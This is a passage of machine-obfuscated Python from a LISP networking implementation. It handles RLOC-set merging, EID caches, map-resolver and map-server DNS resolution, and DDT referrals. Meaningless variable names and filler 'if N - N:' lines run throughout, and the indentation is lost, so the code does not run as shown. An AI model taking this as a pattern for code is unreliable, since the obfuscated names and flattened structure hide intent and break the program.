Ooo0O0 = [ ]
for iIII in self . registered_rlocs :
if ( iIII . rloc . is_null ( ) or len ( Ooo0O0 ) == 0 ) :
Ooo0O0 . append ( iIII )
continue
if 37 - 37: i11iIiiIii - I1Ii111
for Iii1 in Ooo0O0 :
if ( Iii1 . rloc . is_null ( ) ) : continue
if ( iIII . rloc . is_exact_match ( Iii1 . rloc ) ) : break
if 38 - 38: O0 % I11i - I11i / iIii1I11I1II1 - II111iiii
if ( Iii1 == Ooo0O0 [ - 1 ] ) : Ooo0O0 . append ( iIII )
if 13 - 13: II111iiii * OoO0O00 - iIii1I11I1II1
self . registered_rlocs = Ooo0O0
if 30 - 30: O0 - O0 - I1Ii111
if 88 - 88: o0oOOo0O0Ooo % I1Ii111
if 4 - 4: i11iIiiIii + o0oOOo0O0Ooo % I11i - I1ii11iIi11i * I1ii11iIi11i
if 87 - 87: I1Ii111 % i11iIiiIii + O0
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
if 67 - 67: OoooooooOO / i1IIi / ooOoO0o . i1IIi - i11iIiiIii . i1IIi
if 41 - 41: i11iIiiIii / ooOoO0o - Ii1I + I11i
def merge_rles_in_site_eid ( self ) :
if 15 - 15: I1ii11iIi11i
if 22 - 22: iIii1I11I1II1 - i1IIi - i11iIiiIii / I1IiiI + o0oOOo0O0Ooo
if 56 - 56: I1IiiI . ooOoO0o
if 35 - 35: iIii1I11I1II1 % Oo0Ooo + o0oOOo0O0Ooo * o0oOOo0O0Ooo % ooOoO0o
II1iI = { }
for iIII in self . registered_rlocs :
if ( iIII . rle == None ) : continue
for iIIII1iiIII in iIII . rle . rle_nodes :
IiiIIi1 = iIIII1iiIII . address . print_address_no_iid ( )
II1iI [ IiiIIi1 ] = iIIII1iiIII . address
if 26 - 26: OoooooooOO / ooOoO0o - iII111i / OoO0O00 . O0 * OOooOOo
break
if 85 - 85: iIii1I11I1II1 + iII111i + iII111i - ooOoO0o * OoO0O00
if 80 - 80: i11iIiiIii / OOooOOo . OoooooooOO % I11i - iII111i * iIii1I11I1II1
if 70 - 70: Oo0Ooo
if 75 - 75: I1Ii111
if 40 - 40: OoO0O00 % Oo0Ooo / OoooooooOO / i11iIiiIii
self . merge_rlocs_in_site_eid ( )
if 5 - 5: O0 % i11iIiiIii
if 60 - 60: I1ii11iIi11i / I11i
if 100 - 100: I1IiiI
if 44 - 44: iIii1I11I1II1 + Oo0Ooo - I1Ii111 . OoooooooOO
if 28 - 28: Ii1I + OOooOOo % IiII . i11iIiiIii - I1IiiI * Oo0Ooo
if 2 - 2: I11i * I1ii11iIi11i + O0
if 44 - 44: iIii1I11I1II1 / II111iiii - ooOoO0o
if 10 - 10: OOooOOo
OO0O0ooOoOoo0 = [ ]
for iIII in self . registered_rlocs :
if ( self . registered_rlocs . index ( iIII ) == 0 ) :
OO0O0ooOoOoo0 . append ( iIII )
continue
if 73 - 73: OoOoOO00
if ( iIII . rle == None ) : OO0O0ooOoOoo0 . append ( iIII )
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 . Ii1I % OoO0O00 % i11iIiiIii * i11iIiiIii
self . registered_rlocs = OO0O0ooOoOoo0
if 86 - 86: Oo0Ooo % iIii1I11I1II1 . II111iiii / I11i % OoO0O00 % OoO0O00
if 40 - 40: o0oOOo0O0Ooo . iIii1I11I1II1 * Oo0Ooo * i1IIi
if 94 - 94: oO0o - II111iiii + OoOoOO00
if 90 - 90: Oo0Ooo + Oo0Ooo + I1Ii111
if 81 - 81: i1IIi % iIii1I11I1II1 % Ii1I * ooOoO0o % i1IIi * I1IiiI
if 15 - 15: ooOoO0o
if 26 - 26: IiII % ooOoO0o / OOooOOo
i1I1Ii11II1i = lisp_rle ( "" )
iiIIi = { }
IiIi1I1i1iII = None
for oO00Oooo0o0o0 in self . individual_registrations . values ( ) :
if ( oO00Oooo0o0o0 . registered == False ) : continue
oOOooOoOO = oO00Oooo0o0o0 . registered_rlocs [ 0 ] . rle
if ( oOOooOoOO == None ) : continue
if 23 - 23: OoOoOO00 / i11iIiiIii % OoOoOO00
IiIi1I1i1iII = oO00Oooo0o0o0 . registered_rlocs [ 0 ] . rloc_name
for OOOII11i in oOOooOoOO . rle_nodes :
IiiIIi1 = OOOII11i . address . print_address_no_iid ( )
if ( iiIIi . has_key ( IiiIIi1 ) ) : break
if 97 - 97: I1Ii111
iIIII1iiIII = lisp_rle_node ( )
iIIII1iiIII . address . copy_address ( OOOII11i . address )
iIIII1iiIII . level = OOOII11i . level
iIIII1iiIII . rloc_name = IiIi1I1i1iII
i1I1Ii11II1i . rle_nodes . append ( iIIII1iiIII )
iiIIi [ IiiIIi1 ] = OOOII11i . address
if 98 - 98: I11i
if 61 - 61: iIii1I11I1II1 * iII111i
if 67 - 67: i11iIiiIii - Ii1I / Ii1I . iII111i
if 36 - 36: oO0o + Oo0Ooo * I1Ii111 % OOooOOo . Oo0Ooo . I1IiiI
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if 13 - 13: i1IIi
if ( len ( i1I1Ii11II1i . rle_nodes ) == 0 ) : i1I1Ii11II1i = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = i1I1Ii11II1i
if ( IiIi1I1i1iII ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 70 - 70: O0 / II111iiii
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
if ( II1iI . keys ( ) == iiIIi . keys ( ) ) : return ( False )
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# iII111i * O0 * II111iiii / i11iIiiIii * O0 + I1Ii111
II1iI . keys ( ) , iiIIi . keys ( ) ) )
if 42 - 42: iIii1I11I1II1
return ( True )
if 35 - 35: I1ii11iIi11i / OoOoOO00 / i1IIi / i11iIiiIii * iIii1I11I1II1 / i1IIi
if 69 - 69: OOooOOo / I1Ii111 * II111iiii
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
o00Ii = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( o00Ii == None ) :
o00Ii = lisp_site_eid ( self . site )
o00Ii . eid . copy_address ( self . group )
o00Ii . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , o00Ii )
if 88 - 88: OOooOOo - I1IiiI + Oo0Ooo
if 15 - 15: I11i / I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
o00Ii . parent_for_more_specifics = self . parent_for_more_specifics
if 8 - 8: OoooooooOO
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o00Ii . group )
o00Ii . add_source_entry ( self )
if 72 - 72: OoooooooOO % I1ii11iIi11i - OoO0O00 . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo * Ii1I - Oo0Ooo * iII111i - i11iIiiIii
if 6 - 6: I1IiiI + i11iIiiIii + O0 / i1IIi
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
o00Ii = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( o00Ii == None ) : return
if 50 - 50: iII111i . II111iiii % I1Ii111 % I1IiiI / o0oOOo0O0Ooo . I1IiiI
oO00Oooo0o0o0 = o00Ii . lookup_source_cache ( self . eid , True )
if ( oO00Oooo0o0o0 == None ) : return
if 76 - 76: OOooOOo % iII111i
if ( o00Ii . source_cache == None ) : return
if 80 - 80: iIii1I11I1II1 + o0oOOo0O0Ooo + iIii1I11I1II1
o00Ii . source_cache . delete_cache ( self . eid )
if ( o00Ii . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 63 - 63: OoOoOO00 - o0oOOo0O0Ooo % II111iiii - Ii1I
if 81 - 81: iII111i % OOooOOo * oO0o
if 84 - 84: iII111i - OoooooooOO + I1ii11iIi11i - I1IiiI
if 52 - 52: oO0o / ooOoO0o / iII111i / OoOoOO00 * iIii1I11I1II1
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 74 - 74: oO0o . I1ii11iIi11i - iIii1I11I1II1
if 73 - 73: OoO0O00 / O0 . o0oOOo0O0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 100 - 100: Ii1I . OoO0O00 % I1ii11iIi11i % O0 * Oo0Ooo - OoOoOO00
if 15 - 15: OOooOOo - OOooOOo - OoooooooOO * OoO0O00
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 12 - 12: II111iiii * I1Ii111 / I1Ii111 * oO0o * Oo0Ooo
if 17 - 17: OoOoOO00 % I1Ii111 / iII111i * I1Ii111
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 96 - 96: Oo0Ooo % o0oOOo0O0Ooo . OoOoOO00 % i11iIiiIii / OoooooooOO
if 87 - 87: OoooooooOO - Ii1I . I11i / I1Ii111 . i1IIi
def inherit_from_ams_parent ( self ) :
i1II1 = self . parent_for_more_specifics
if ( i1II1 == None ) : return
self . force_proxy_reply = i1II1 . force_proxy_reply
self . force_nat_proxy_reply = i1II1 . force_nat_proxy_reply
self . force_ttl = i1II1 . force_ttl
self . pitr_proxy_reply_drop = i1II1 . pitr_proxy_reply_drop
self . proxy_reply_action = i1II1 . proxy_reply_action
self . echo_nonce_capable = i1II1 . echo_nonce_capable
self . policy = i1II1 . policy
self . require_signature = i1II1 . require_signature
if 86 - 86: i1IIi . oO0o % OOooOOo
if 99 - 99: oO0o / I1Ii111 * oO0o * I11i
def rtrs_in_rloc_set ( self ) :
for iIII in self . registered_rlocs :
if ( iIII . is_rtr ( ) ) : return ( True )
if 38 - 38: o0oOOo0O0Ooo + OoOoOO00
return ( False )
if 24 - 24: Ii1I - OOooOOo - o0oOOo0O0Ooo - I1Ii111 / OoooooooOO
if 17 - 17: OoO0O00
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for iIII in self . registered_rlocs :
if ( iIII . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( iIII . is_rtr ( ) ) : return ( True )
if 79 - 79: Ii1I - II111iiii
return ( False )
if 57 - 57: II111iiii / OoooooooOO
if 4 - 4: I11i * OoOoOO00
def is_rloc_in_rloc_set ( self , rloc ) :
for iIII in self . registered_rlocs :
if ( iIII . rle ) :
for i1I1Ii11II1i in iIII . rle . rle_nodes :
if ( i1I1Ii11II1i . address . is_exact_match ( rloc ) ) : return ( True )
if 18 - 18: iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * i1IIi + Oo0Ooo
if 87 - 87: oO0o . I11i
if ( iIII . rloc . is_exact_match ( rloc ) ) : return ( True )
if 15 - 15: oO0o
return ( False )
if 45 - 45: Oo0Ooo * IiII * OoO0O00 + iIii1I11I1II1
if 89 - 89: IiII . IiII . oO0o % iII111i
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 27 - 27: OoOoOO00 + O0 % i1IIi - Oo0Ooo
for iIII in prev_rloc_set :
o00Oo00o0oO0 = iIII . rloc
if ( self . is_rloc_in_rloc_set ( o00Oo00o0oO0 ) == False ) : return ( False )
if 96 - 96: O0 % o0oOOo0O0Ooo + OOooOOo % I1IiiI
return ( True )
if 51 - 51: i1IIi . o0oOOo0O0Ooo % I1IiiI - OoooooooOO / OoOoOO00 - I11i
if 45 - 45: O0 * II111iiii / i11iIiiIii
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
class lisp_mr ( ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
if 59 - 59: OoO0O00 % iII111i + oO0o * II111iiii . OOooOOo
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
if 26 - 26: OOooOOo % OoooooooOO . Ii1I / iIii1I11I1II1 * I1IiiI
if 85 - 85: IiII / Ii1I - I1ii11iIi11i * OOooOOo
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 19 - 19: I1ii11iIi11i
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
I11IiiIII1i1 = IIiiI [ 2 ]
except :
return
if 15 - 15: II111iiii * O0 % I1ii11iIi11i % Ii1I . OoOoOO00
if 8 - 8: IiII / Oo0Ooo % OOooOOo + O0 - Ii1I
if 43 - 43: O0 % i11iIiiIii + o0oOOo0O0Ooo . I11i / OOooOOo . O0
if 30 - 30: i11iIiiIii + i1IIi
if 52 - 52: OoooooooOO % OoOoOO00 / IiII % OoO0O00
if 36 - 36: II111iiii . O0 % O0 * iII111i * iIii1I11I1II1
if ( len ( I11IiiIII1i1 ) <= self . a_record_index ) :
self . delete_mr ( )
return
if 42 - 42: iII111i . OOooOOo + oO0o / OoOoOO00
if 54 - 54: ooOoO0o % o0oOOo0O0Ooo + i11iIiiIii / ooOoO0o * II111iiii * Ii1I
IiiIIi1 = I11IiiIII1i1 [ self . a_record_index ]
if ( IiiIIi1 != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( IiiIIi1 )
self . insert_mr ( )
if 52 - 52: ooOoO0o + IiII * OoOoOO00 - OoO0O00 - OoooooooOO - oO0o
if 60 - 60: iII111i / oO0o
if 98 - 98: OoOoOO00 / OOooOOo
if 31 - 31: II111iiii % I11i - I11i
if 17 - 17: iII111i . IiII + OOooOOo % I1Ii111 % i11iIiiIii
if 100 - 100: i11iIiiIii - O0 . OoO0O00 / O0 - Ii1I - IiII
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 72 - 72: Ii1I % O0 + II111iiii . i11iIiiIii
for IiiIIi1 in I11IiiIII1i1 [ 1 : : ] :
OO0o = lisp_address ( LISP_AFI_NONE , IiiIIi1 , 0 , 0 )
O0o00000o0O = lisp_get_map_resolver ( OO0o , None )
if ( O0o00000o0O != None and O0o00000o0O . a_record_index == I11IiiIII1i1 . index ( IiiIIi1 ) ) :
continue
if 66 - 66: II111iiii % I1IiiI
O0o00000o0O = lisp_mr ( IiiIIi1 , None , None )
O0o00000o0O . a_record_index = I11IiiIII1i1 . index ( IiiIIi1 )
O0o00000o0O . dns_name = self . dns_name
O0o00000o0O . last_dns_resolve = lisp_get_timestamp ( )
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 + I1Ii111 * OOooOOo . I1IiiI
if 96 - 96: I1ii11iIi11i
if 37 - 37: OoO0O00 % o0oOOo0O0Ooo * O0 * O0 + iII111i
if 18 - 18: i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % oO0o * Ii1I / I1IiiI
if 46 - 46: o0oOOo0O0Ooo . ooOoO0o / Ii1I
O0ooo0oO00 = [ ]
for O0o00000o0O in lisp_map_resolvers_list . values ( ) :
if ( self . dns_name != O0o00000o0O . dns_name ) : continue
OO0o = O0o00000o0O . map_resolver . print_address_no_iid ( )
if ( OO0o in I11IiiIII1i1 ) : continue
O0ooo0oO00 . append ( O0o00000o0O )
if 86 - 86: I11i * ooOoO0o / O0 + i11iIiiIii
for O0o00000o0O in O0ooo0oO00 : O0o00000o0O . delete_mr ( )
if 18 - 18: OoooooooOO % OOooOOo + I1ii11iIi11i * I1Ii111 / OOooOOo / I1IiiI
if 7 - 7: OOooOOo / OoOoOO00
def insert_mr ( self ) :
ii1i1I1111ii = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ ii1i1I1111ii ] = self
if 93 - 93: iIii1I11I1II1 * Ii1I - iII111i
if 94 - 94: iIii1I11I1II1 * iIii1I11I1II1 * I11i % i11iIiiIii
def delete_mr ( self ) :
ii1i1I1111ii = self . mr_name + self . map_resolver . print_address ( )
if ( lisp_map_resolvers_list . has_key ( ii1i1I1111ii ) == False ) : return
lisp_map_resolvers_list . pop ( ii1i1I1111ii )
if 38 - 38: I1IiiI % I1ii11iIi11i * I1IiiI + OOooOOo - OoOoOO00
if 78 - 78: OOooOOo + I1Ii111
if 41 - 41: I11i + Oo0Ooo . Oo0Ooo / iII111i . OoOoOO00
class lisp_ddt_root ( ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
if 1 - 1: ooOoO0o + iII111i % i11iIiiIii / OoOoOO00
if 98 - 98: IiII
if 75 - 75: OoooooooOO % IiII + Ii1I - i1IIi / OoooooooOO
class lisp_referral ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
if 57 - 57: iII111i
if 18 - 18: II111iiii % i11iIiiIii + I11i - OOooOOo
def print_referral ( self , eid_indent , referral_indent ) :
OOO0o = lisp_print_elapsed ( self . uptime )
I1i11iiI1i = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , OOO0o ,
# OoO0O00 % I11i * OoO0O00 / IiII / I1IiiI
I1i11iiI1i , len ( self . referral_set ) ) )
if 77 - 77: IiII / i1IIi + OOooOOo + Oo0Ooo % iII111i % OoOoOO00
for ii in self . referral_set . values ( ) :
ii . print_ref_node ( referral_indent )
if 6 - 6: i11iIiiIii + ooOoO0o
if 89 - 89: iIii1I11I1II1 . I1Ii111
if 43 - 43: Oo0Ooo + o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i / iIii1I11I1II1 . I1ii11iIi11i
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if 59 - 59: IiII . OoO0O00 - OoooooooOO . O0
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if 33 - 33: Ii1I
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
return ( lisp_map_referral_action_string [ self . referral_type ] )
if 40 - 40: I1IiiI / OOooOOo * Ii1I
if 98 - 98: I1IiiI
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 4 - 4: I1IiiI % O0 / Oo0Ooo / O0
if 90 - 90: ooOoO0o - O0 . IiII - O0 . iIii1I11I1II1
def print_ttl ( self ) :
oo0o = self . referral_ttl
if ( oo0o < 60 ) : return ( str ( oo0o ) + " secs" )
if 42 - 42: I1ii11iIi11i
if ( ( oo0o % 60 ) == 0 ) :
oo0o = str ( oo0o / 60 ) + " mins"
else :
oo0o = str ( oo0o ) + " secs"
if 51 - 51: iII111i % i11iIiiIii . OoO0O00 . IiII - OoOoOO00 * i1IIi
return ( oo0o )
if 14 - 14: I1ii11iIi11i . OoO0O00
if 26 - 26: iII111i / ooOoO0o / Oo0Ooo / Oo0Ooo . I1ii11iIi11i * OOooOOo
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
# I11i % IiII
LISP_DDT_ACTION_NOT_AUTH ) )
if 24 - 24: O0 % OOooOOo - OoooooooOO
if 29 - 29: O0 + iII111i
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
o0ooo000OO = lisp_referral_cache . lookup_cache ( self . group , True )
if ( o0ooo000OO == None ) :
o0ooo000OO = lisp_referral ( )
o0ooo000OO . eid . copy_address ( self . group )
o0ooo000OO . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , o0ooo000OO )
if 4 - 4: I11i * I11i - Ii1I * oO0o . I1ii11iIi11i % o0oOOo0O0Ooo
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0ooo000OO . group )
o0ooo000OO . add_source_entry ( self )
if 33 - 33: Ii1I * i11iIiiIii / O0 . Oo0Ooo + i1IIi . OoOoOO00
if 76 - 76: OoooooooOO - O0
if 17 - 17: Oo0Ooo % I1Ii111 . oO0o - O0
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
o0ooo000OO = lisp_referral_cache . lookup_cache ( self . group , True )
if ( o0ooo000OO == None ) : return
if 32 - 32: O0 % O0
I11iiiIIi1Ii1 = o0ooo000OO . lookup_source_cache ( self . eid , True )
if ( I11iiiIIi1Ii1 == None ) : return
if 66 - 66: iII111i / i1IIi - Oo0Ooo . Ii1I
o0ooo000OO . source_cache . delete_cache ( self . eid )
if ( o0ooo000OO . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
if 65 - 65: I1ii11iIi11i % ooOoO0o - OoOoOO00 + ooOoO0o + Oo0Ooo
if 95 - 95: I1Ii111 * i11iIiiIii - I1IiiI - OoOoOO00 . ooOoO0o
if 34 - 34: OoooooooOO % I1ii11iIi11i + OoooooooOO % i11iIiiIii / IiII - ooOoO0o
if 74 - 74: iIii1I11I1II1 % II111iiii + IiII
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
if 71 - 71: I1IiiI / O0 * i1IIi . i1IIi + Oo0Ooo
if 32 - 32: i1IIi * I1Ii111 % I1IiiI / IiII . I1Ii111
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 11 - 11: OOooOOo
if 25 - 25: i1IIi
if 99 - 99: OOooOOo + OoooooooOO . I1Ii111 * Oo0Ooo % oO0o
class lisp_referral_node ( ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
if 75 - 75: iII111i
if 8 - 8: I1ii11iIi11i . I11i / I1ii11iIi11i - i1IIi
def print_ref_node ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , Oo0OO0000oooo ,
# OOooOOo . O0
"up" if self . updown else "down" , self . priority , self . weight ) )
if 52 - 52: oO0o . ooOoO0o - I1Ii111 + OoooooooOO
if 86 - 86: I1ii11iIi11i - I1Ii111 + oO0o % II111iiii - i1IIi
if 32 - 32: I1Ii111 % ooOoO0o + I1Ii111 / I1ii11iIi11i - o0oOOo0O0Ooo + ooOoO0o
class lisp_ms ( ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = lisp_map_servers_list . values ( ) [ 0 ] . xtr_id
if 46 - 46: OoO0O00 % OoO0O00 . O0 + II111iiii
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
if 42 - 42: OOooOOo * I1Ii111
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
if 91 - 91: iII111i . OoooooooOO
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 90 - 90: i11iIiiIii - I1IiiI
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
I11IiiIII1i1 = IIiiI [ 2 ]
except :
return
if 39 - 39: iII111i % OoooooooOO % Ii1I % I1IiiI
if 63 - 63: OoO0O00 - I1Ii111 - II111iiii
if 79 - 79: II111iiii - II111iiii + OoOoOO00 / iII111i % OoooooooOO - OoO0O00
if 22 - 22: o0oOOo0O0Ooo + I1Ii111 . Oo0Ooo
if 84 - 84: O0 + I1IiiI % Oo0Ooo + OOooOOo
if 94 - 94: OOooOOo
if ( len ( I11IiiIII1i1 ) <= self . a_record_index ) :
self . delete_ms ( )
return
if 81 - 81: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii / OOooOOo / iII111i
if 34 - 34: i11iIiiIii - o0oOOo0O0Ooo * OoooooooOO * I1ii11iIi11i * Oo0Ooo % I1ii11iIi11i
IiiIIi1 = I11IiiIII1i1 [ self . a_record_index ]
if ( IiiIIi1 != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( IiiIIi1 )
self . insert_ms ( )
if 31 - 31: I11i . o0oOOo0O0Ooo
if 82 - 82: I11i - Oo0Ooo
if 77 - 77: I1IiiI + OoO0O00 % iIii1I11I1II1 - OOooOOo
if 80 - 80: oO0o % I1ii11iIi11i * I1Ii111 + i1IIi
if 79 - 79: oO0o + IiII
if 4 - 4: iII111i + OoooooooOO / I1Ii111
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 57 - 57: I1IiiI . iIii1I11I1II1 % iII111i * iII111i / I1Ii111
for IiiIIi1 in I11IiiIII1i1 [ 1 : : ] :
OO0o = lisp_address ( LISP_AFI_NONE , IiiIIi1 , 0 , 0 )
o00oO0Oo = lisp_get_map_server ( OO0o )
if ( o00oO0Oo != None and o00oO0Oo . a_record_index == I11IiiIII1i1 . index ( IiiIIi1 ) ) :
continue
if 30 - 30: O0 / I11i % OoOoOO00 * I1Ii111 / O0 % ooOoO0o
o00oO0Oo = copy . deepcopy ( self )
o00oO0Oo . map_server . store_address ( IiiIIi1 )
o00oO0Oo . a_record_index = I11IiiIII1i1 . index ( IiiIIi1 )
o00oO0Oo . last_dns_resolve = lisp_get_timestamp ( )
o00oO0Oo . insert_ms ( )
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
if 88 - 88: i1IIi . I1IiiI
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
O0ooo0oO00 = [ ]
for o00oO0Oo in lisp_map_servers_list . values ( ) :
if ( self . dns_name != o00oO0Oo . dns_name ) : continue
OO0o = o00oO0Oo . map_server . print_address_no_iid ( )
if ( OO0o in I11IiiIII1i1 ) : continue
O0ooo0oO00 . append ( o00oO0Oo )
if 51 - 51: oO0o + Ii1I * Ii1I * I1ii11iIi11i % I11i - I1ii11iIi11i
for o00oO0Oo in O0ooo0oO00 : o00oO0Oo . delete_ms ( )
if 15 - 15: i1IIi / OoO0O00 - Oo0Ooo
if 74 - 74: o0oOOo0O0Ooo % Ii1I - II111iiii / ooOoO0o
def insert_ms ( self ) :
ii1i1I1111ii = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ ii1i1I1111ii ] = self
if 84 - 84: I1IiiI + OOooOOo
if 80 - 80: OOooOOo / OoOoOO00
def delete_ms ( self ) :
ii1i1I1111ii = self . ms_name + self . map_server . print_address ( )
if ( lisp_map_servers_list . has_key ( ii1i1I1111ii ) == False ) : return
lisp_map_servers_list . pop ( ii1i1I1111ii )
if 93 - 93: OOooOOo
if 82 - 82: iIii1I11I1II1 + OoO0O00 / iIii1I11I1II1 . iIii1I11I1II1
